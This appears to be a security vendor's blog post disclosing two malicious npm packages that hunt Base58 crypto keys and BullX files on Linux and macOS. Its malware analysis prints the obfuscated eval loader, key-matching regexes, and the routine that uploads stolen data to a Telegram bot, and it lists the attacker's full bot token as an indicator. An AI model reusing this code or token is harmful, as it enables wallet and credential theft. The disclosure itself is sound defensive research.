
Research
/Security News
60 Malicious Ruby Gems Used in Targeted Credential Theft Campaign
A RubyGems malware campaign used 60 malicious packages posing as automation tools to steal credentials from social media and marketing tool users.
Kush Pandya
May 8, 2025
Is Your Cryptocurrency Safe, or Is an npm Trojan Silently Emptying Your Wallets?
Socket’s Threat Research Team uncovered two malicious npm packages pumptoolforvolumeandcomment
and its wrapper [debugdogs](<https://socket.dev/npm/package/debugdogs/overview/1.0.0>)
published by the same threat actor under the npm alias olumideyo
. The loader in pumptoolforvolumeandcomment
decodes an obfuscated payload that hunts for Base58-encoded cryptocurrency keys, wallet files, and “BullX” trading data across user directories on Linux and macOS systems, then exfiltrates sensitive data via a Telegram bot. Meanwhile, debugdogs
simply invokes pumptoolforvolumeandcomment
, making it a convenient secondary infection payload. This highly targeted attack can empty wallets and expose sensitive credentials and trading data in seconds.
BullX is a cryptocurrency trading platform popular among crypto traders for its speed and efficiency in trading newly launched coins. The malicious actor explicitly target its users to exfiltrate sensitive credentials and trading information.
BullX trading platform specifically targeted by olumideyo
index.js
):const fs = require('fs');
const path = require('path');
const base64Encoded = fs.readFileSync(path.join(__dirname, 'parts.txt'), 'utf8');
const decodedScript = Buffer.from(base64Encoded, 'base64').toString('utf8');
eval(decodedScript); // Executes the hidden malicious payload
Socket’s AI Scanners flagged the malicious npm package pumptoolforvolumeandcomment
due to its obfuscated payload.
Socket’s AI scanner flagging the malicious npm package
The base64-decoded malicious payload found in the parts.txt, revealed advanced file-stealing capabilities, targeting cryptocurrency keys and specifically BullX-related files:
/media
mounts) and macOS (leveraging the /Volumes
mount point). It won’t work on Windows out of the box, since it only looks in POSIX paths like ~/Documents
, /media
, and /Volumes
..txt
, .env
, .docs
, .log
, .cfg
, .ini
).PATTERN_NAME_1 = /\b[123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{58,}\b/g;
PATTERN_NAME_2 = /\b[123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{43,57}\b/g;
PATTERN_NAME_3 = /\b[123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{58,}\b:\b[123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{43,}\b/g;
The regular expressions used by the malware specifically target Base58-encoded strings commonly used in cryptocurrency wallets and private keys, indicating the intent to steal crypto-related credentials. This targeted approach increases the risk of financial loss and unauthorized access to crypto assets.
if (file_path.includes('BullX') && file_path.endsWith('.txt')) {
bullX_contents.push({ file: file_path, content });
}
The malware compiles discovered secrets into a structured JSON file (fss.json
) and uploads this file using an attacker-controlled Telegram bot, enabling stealthy and real-time exfiltration:
const form = new FormData();
form.append('chat_id', chat_id);
form.append('document', fs.createReadStream(filePath));
const bot_token = "7477833207:<REDACTED>";
const chat_id = "-1002402864775";
await axios.post(`https://api.telegram.org/bot${bot_token}/sendDocument`, form);
if (Object.values(keys_grouped).some(group => group.length > 0) || bullX_contents.length > 0) {
const jsonMessage = format_keys_message();
const filePath = path.join(customDir, 'fss.json'); // Save the JSON in the custom folder
save_json_to_file(jsonMessage, filePath);
send_json_file_to_telegram(filePath);
This setup allows the threat actor to receive instant updates and credentials, increasing the risk of rapid and targeted attacks against BullX traders and crypto wallet holders.
debugdogs
) Identified:#Upon deeper investigation, we discovered another npm package by the same malicious author named debugdogs
, containing minimal functionality:
const pumptool = require('pumptoolforvolumeandcomment');
console.log(pumptool());
By pointing directly at pumptoolforvolumeandcomment
, the author ensures that anyone installing debugdogs
will automatically pull in and execute the real payload. This “wrapper” pattern doubles down on the main attack, making it easier to spread under multiple names without changing the core malicious code.
Malicious authorolumideyo's
npm profile (registration emailbomakingg@gmail[.]com
)
The targeted nature of this attack places affected users at high risk:
This attack highlights the urgent need for better scrutiny of npm packages in cryptocurrency and trading-related environments.
The targeted discovery of pumptoolforvolumeandcomment
and related packages (debugdogs
) underscores a growing and dangerous trend in software supply chain attacks targeting cryptocurrency traders and platforms like BullX. Attackers specifically exploit trust in developer-friendly tools and communication channels like Telegram, aiming for high-value credentials.
Developers and cryptocurrency users must adopt rigorous security practices to combat these threats, including automated dependency scanning, runtime behavior monitoring, and robust credentials management.
Integrating Socket’s security tools early in your workflow significantly mitigates such supply-chain attacks, protecting critical data from compromise and theft.
Telegram is consistently being used by threat actors to exfiltrate sensitive data due to its ease of use and low barrier of entry: it is trivial to spin up a Telegram bot in minutes and start receiving exfiltrated data.
olumideyo
gojothenerd
- name aliasbomakingg@gmail[.]com
- email address7477833207:AAGAxGtCoo2NXFD62dUV9DdT3HpK6d2PnHI
1002402864775
Subscribe to our newsletter
Get notified when we publish new security blog posts!
Try it now
Research
/Security News
A RubyGems malware campaign used 60 malicious packages posing as automation tools to steal credentials from social media and marketing tool users.
Research
/Security News
Two npm packages masquerading as WhatsApp developer libraries include a kill switch that deletes all files if the phone number isn’t whitelisted.
Research
/Security News
Socket uncovered 11 malicious Go packages using obfuscated loaders to fetch and execute second-stage payloads via C2 domains.